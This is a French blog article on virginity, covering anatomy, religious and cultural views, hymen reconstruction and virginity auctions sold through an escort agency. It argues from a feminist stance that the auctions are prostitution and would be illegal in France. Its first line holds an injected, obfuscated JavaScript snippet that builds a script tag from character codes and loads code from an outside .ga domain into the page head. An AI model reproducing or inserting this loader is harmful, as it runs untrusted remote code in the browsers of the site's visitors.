Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Virginité : entre fantasme, religion et business, un concept illusoire?

Et si on osait parler virginité? 

 ” A 18 ans elle vend sa virginité aux enchères pour 2,3 millions d’euros”

En lisant les dernières nouvelles, j’ai appris avec surprise et une pointe d’amusement qu’Alexandra Khefren, un jeune mannequin Roumain est devenue millionaire en vendant sa “première fois” à un homme d’affaire de Hong Kong.

J’aurai pu simplement partager l’info croustillante avec les copines puis passer à autre chose. Mais cet article m’a laissé totalement perplexe, j’avais l’impression d’avoir dans ma tête une enfant agaçante qui pose trop de questions.

Comment on fait pour vendre sa virginité d’abord? Et puis n’est ce pas un bien inestimable? Moralement, ça reste douteux, non? Est-ce que ce serais pas de la prostitution? Ce serais légal en France, tu crois? En vrai qu’est-ce que c’est la virginité?

Et j’en passe.

Depuis la nuit des temps, la virginité est un concept controversé, selon les époques son sens évolue et changent.

La Virginité : un concept illusoire?

Une question anatomique : Touche pas à mon hymen

 

virginité

Comme lors de nos bon vieux cours de biologie, arrive le moment gênant où on rentre dans les détails. Généralement la virginité d’une femme est associée à la présence de l’hymen. C’est la membrane qui obture de façon incomplète l’entrée du vagin et se rompt lors des premiers rapports sexuels. Cela peut aussi se produire de manière indirect, lors par exemple d’une activité physique.

Il est communément acquis que lors de sa rupture l’hymen causerait une perte de sang qui serait la « preuve » irréfutable de la virginité ». INTOX! Cela n’est pas une vérité absolue! Chaque femme est différente mes chers.

On peut alors tout de même se demander comment la virginité pourrais reposer uniquement sur ce fameux « hymen »?

En partant de ce postulat, cela voudrait dire que les femmes pratiquant uniquement une sexualité orale ou anale dans le but de préserver leur hymen seraient encore vierges?

C’est tout à fait discutable, c’est pourquoi nous allons creuser un peu plus loin que la simple définition anatomique.

Une question religieuse : Et Dieu créa la femme

virginité

Comment parler de virginité et de religion sans immédiatement penser à la « Vierge Marie». En effet, à travers le dogme de l’immaculée conception Marie est exemptée de la souillure du péché originel. Cela induit la perfection de son fils, représenté comme Dieu dans la religion chrétienne, Jésus Christ.

«  Innocente et sans péché, inviolée, sans tache, qui a fleuris comme un lis parmi les épines… ignorante des mauvais penchants d’Eve ».

Si on rebobine le film au tout début, la femme descendante d’Eve serait la source de toutes les misères humaines. Cause du bannissement du Jardin d’Eden c’est une tentatrice que l’on range aux cotés de Satan.

Dans les trois grandes religions monothéistes il est demandé, voire imposé, aux femmes d’être chastes avant le mariage.

Sous cet auspice, on ne leur demande pas une simple virginité anatomique , mais une pureté du corps et de l’âme.

Toute sexualité hors mariage est prohibée. En effet la chasteté « exige la pureté morale en pensée, en parole et en action ».

Dans le christianisme, la virginité est un devoir. Mais si la femme manque à son engagement elle peut tout de même recevoir le pardon et se marier.

Dans la religion juive, la virginité est le symbole de la pureté de la descendance de l’homme. Elle assure surtout la primauté de l’homme et de sa lignée.

En Islam, la virginité est une preuve de noblesse, une forme de contrôle et de maitrise de soi dans lesquels il faut intérioriser ses désirs. A l’instar de la religion juive, il y a dans cette symbolique une forte domination masculine. Car contrairement à la religion catholique, les hommes semblent pouvoir être « exemptés » de cette abstinence.

  • Une symbolique forte mais déséquilibrée

En religion, la virginité féminine est vue comme une grande manifestation de la foi, c’est l’expression de la fidélité envers Dieu. Une femme célibataire qui reste vierge toute sa vie, ira selon « les livres » directement au Paradis.

L’inverse provoquerait la colère de Dieu et classerait ces femmes au rang de perfides pécheresses.

Cela marque bien une différence fondamentale de traitement entre l’homme et la femme : voire une emprise masculine sur ce concept de virginité féminine.

Une question culturelle : La Cour des miracles

virginité

En creusant un peu, on se rend compte qu’il y en a pour tous les goûts. La virginité a une forte place symbolique dans différentes cultures à travers le temps et le globe. 

  • Occident

En Occident par exemple, si on met peu à peu de coté les questions religieuses, la société occidentale demeure très moralisatrice au regard de la femme. De fait, l’éducation de l’homme et de la femme se scinde. On continue de soumettre ce qu’on considère comme le “sexe faible” aux croyances chrétiennes.

L’éducation de la femme est soumise à l’obscurantisme : l’ignorance est assimilée à l’innocence.

  • Asie

En Asie, comme en Chine ou au Cambodge par exemple, la symbolique de la virginité est impressionnante. La virginité est vue comme une chose rare et pure, que les hommes convoitent. Il existe certaines croyances prétendant qu’avoir un rapport sexuel avec une vierge guérirait de certaines maladies comme le Sida. Ce fantasme, pousse des familles pauvres à vendre la virginité de leur filles à des hommes riches.

Dans la Chine contemporaine, les relations pré-nuptiales entre célibataires sont plus fréquemment acceptées, même ci cela dépend encore de beaucoup de variantes sociales et géographiques.

Dans la société Cambodgienne, les filles doivent se préserver ce qui n’est pas le cas des hommes. La valorisation extrême de la virginité cumulée aux comportements masculins mènent à de grave dérives (prostitution très populaire).

Pour généraliser, la virginité reste en Asie, un don précieux que fait une femme à son mari en gage d’engagement, de fidélité et d’honnêteté.

En Inde, la virginité des jeunes filles avant le mariage est exigée. L’objectif premier dans la vie d’une femme indienne est de se marier pour procréer et fonder une famille.

Cependant, la chasteté masculine est aussi représentée comme un idéal pour les hommes. En effet l’acte sexuel est vu comme une perte d’énergie. En outre, le brahmacharya qui est l’abstinence complète dans le célibat est recommandé pour les hommes désirant dédier leur vie à la méditation. Le Mahatma Gandhi personnage célèbre Indien, aura fait preuve de chasteté pendant une grande partie de sa vie.

  • Afrique et Moyen-Orient

Dans les pays musulmans, la coutume veut que la femme prouve et atteste de sa virginité en montrant le linge taché de sang (causé par la rupture de l’hymen) après la noce. Cérémonie empruntée à la religion hébraïque, qui reste parfois une humiliation pour ces jeunes femmes.  Les musulmans considèrent que la perte de l’hymen et la circoncision sont des étapes similaires, (du fait de la perte anatomique) qui font entrer l’homme et la femme dans la vie adulte.

  • Amériques

Aux Etats-Unis, après la mode des bagues de chasteté témoin du choix d’abstinence pré-nuptial de la jeunesse catholique américaine, le mouvement NO SEX prend du terrain. Ce mouvement revendique l’abstinence et l’absence de désir. Les “No sex” refusent que la société leur impose une sexualité. Cette psychose autour de la virginité se retrouve même dans les programmes éducatifs américains. De fait, Abstinence-Only enseigne aux étudiants américains les dangers de la sexualité.

Contrairement aux sociétés patriarcales que nous connaissons, dans certaines tribus Incas ou culture amérindienne, la virginité est très impopulaire. La femme doit perdre sa virginité avant le mariage.

Un fantasme pour les hommes, une angoisse, une pression pour les femmes?

Depuis la nuit des temps , une certaine domination masculine flotte et s’exerce à travers cette symbolique de la virginité. Les femmes ont subit pendant longtemps ce déséquilibre, ce reniement de l’égalité des sexes. Aujourd’hui une jeune femme de 18 ans peut devenir millionnaire en vendant cette soi-disant « pureté ». Cette pureté n’est plus au service d’un homme mais tout simplement d’elle-même. 

La féminité, la sexualité devient une monnaie d’échange, un pouvoir et non plus un chaste cadeau.

La virginité : Un business fructueux 

La revirginisation : une virginité obsessionnelle

virginitéPour pallier à la perte de l’hymen certaine femme sous la pression sociale ou par choix personnel, décide d’employer la médecine afin de retrouver leur « virginité »

  • L’hyménoplastie ou chirurgie de reconstruction de l’hymen,  est une  intervention chirurgicale bénigne et rapide, effectuée peu de temps avant le mariage afin de faire illusion d’une première perte de l’hymen.

Auparavant, 4 à 6 de ces opérations étaient effectuées par an, dans les cliniques parisiennes , aujourd’hui nous sommes toujours à  4 à 6 opérations mais par semaine!

  • L’hymen artificiel de virginité, est un système digne de la prestidigitation!  Il consiste à simuler la perte de sang qui suit (parfois) le premier rapport. C’est une petite poche translucide contenant un liquide rouge placée 20min avant le rapport sexuel, qui simule apparement parfaitement une vraie rupture de l’hymen .

Ce fétichisme autour de l’hymen prouve bien que le corps de la femme porte encore aujourd’hui une symbolique très forte.

La virginité mise aux enchères

virginitéLes enchères de femmes vierges se font souvent sur internet. Le plus offrant gagne le droit d’être le premier à avoir un rapport sexuel avec ladite personne.

La première enchère de ce type jamais reportée a été lancée online par une jeune américaine de 24 ans, mais elle s’est ensuite avérée être fictive.

Quelques mois plus tard, en Grande Bretagne, une jeune fille de 18 ans ira jusqu’au bout et sera la première à réellement vendre sa virginité pour 8.400 pounds à un ingénieur anglais.

S’en suit une dizaine de cas similaires, au Brésil, en Sibérie, en Belgique ou encore en Hongrie.

Or, il est important de noter que la plupart du temps, les jeunes filles se ravisent avant de passer à l’acte, quand bien même les propositions grimpent haut.

Le nombre de jeune fille devenues millionnaires en vendant leur virginité ne cesse d’augmenter. C’est une américaine, Nathalie Dylan, qui détient pour le moment la palme de la plus grosse vente aux enchères, avec la somme de 3.7 millions de dollars. 

virginité

  •  L’Agence Cinderella Escorts

Le cas qui a retenu toute mon attention reste ce jeune mannequin Roumain qui a vendu il y a quelques jours sa virginité pour 2.4 millions d’Euros. Car en m’y intéressant de plus près, j’ai appris que contrairement aux autres jeune filles, elle était passé par une agence d’escort : Cinderella escorts.

C’est une agence Allemande basée à Dortmund,  qui en plus de proposer des escorts, se spécialise dans les enchères de jeunes filles vierges.

Selon eux ces jeunes femmes passent des entretiens très sérieux incluant des test psychologiques avant d’être proposées aux enchères.

En effet sur leur site, seulement 8 chastes demoiselles ( photos très sexy à l’appui) sont proposées. Une fiche détaillant leurs caractéristiques mais surtout leurs motivations est disponible pour chacune d’entre-elles.

Ces jeunes filles sont âgées de 18 à 26 ans. Elles ont quasiment toutes les mêmes arguments : 

Soit elles veulent payer leur études, aider leur famille et voyager

Soit, elles se disent que quitte à donner sa virginité à un homme qui les fera souffrir autant lui faire payer le prix fort

  • Objectivation de la femme et sa sexualité

On est tenté d’y croire. Tenté de se dire que quelque part, on pourrait y voir une sorte de reprise de pouvoir de la femme sur son corps et sur toute cette symbolique de virginité cousue par l’homme. Mais en voyant sur la fiche d’Alexandra Khefren, qu’elle était ENFIN VENDUE! On comprend avec déception que ce ne n’est qu’une autre forme d’objectivation de la femme.

C’est un service de luxe pour des hommes très riches qui n’ont plus rien à découvrir sexuellement , qui ont tout testé. Ils assouvissent ainsi leurs fantasmes et leurs pulsions hégémoniques sur un terrain encore jamais possédé et qu’aucun autre ne possèdera après eux : la femme vierge.

  • Un regard juridique

Selon moi, tout cela n’est qu’une nouvelle expression de la prostitution.

C’est pourquoi, je me suis intéressée sur le fait de savoir si en France, une agence pareille et de telles enchères serait légales?

Et bien non! Car l’article 16-5 du code civil consacrant le principe de l’indisponibilité du corps humain l’interdit formellement ( Je savais bien qu’un jour ou l’autre ma licence de droit servirait! ).

De fait, les contrats ou conventions ayant pour effet de conférer une quelconque valeur patrimonial au corps humain, à ses éléments ou à ses produits est nul. En France, Adieu les millions, le contrat de Mlle Khefren serait simplement caduque.

D’ailleurs si la prostitution est autorisée en Allemagne, en France, cela relèverait du proxénétisme aggravé. En effet, «  aider, assister, protégé (…) ou tirer profit de la prostitution d’autrui » est un délit puni par une peine d’emprisonnement pouvant aller jusqu’à 20 ans.

  • Un combat sans fin pour l’égalité des sexes

La virginité est un sujet énormément controversé et manipulé . Cruellement délaissé et dépourvu de valeurs humanistes, pour une quête illusoire de pureté, de jeunesse ou de pouvoir. Ce n’est surement pas à coup de million que le combat pour l’égalité des sexes ou le féminisme gagneront la partie.

Si en terminant votre lecture, vous avez à tout hasard une petite envie de féminisme, je vous conseille de lire sans attendre “Qu’est ce que le féminisme en 2017“, un article de Margaux Ponthieux qui saura vous redonner espoir en l’avenir!

Melissa De Souza

virginité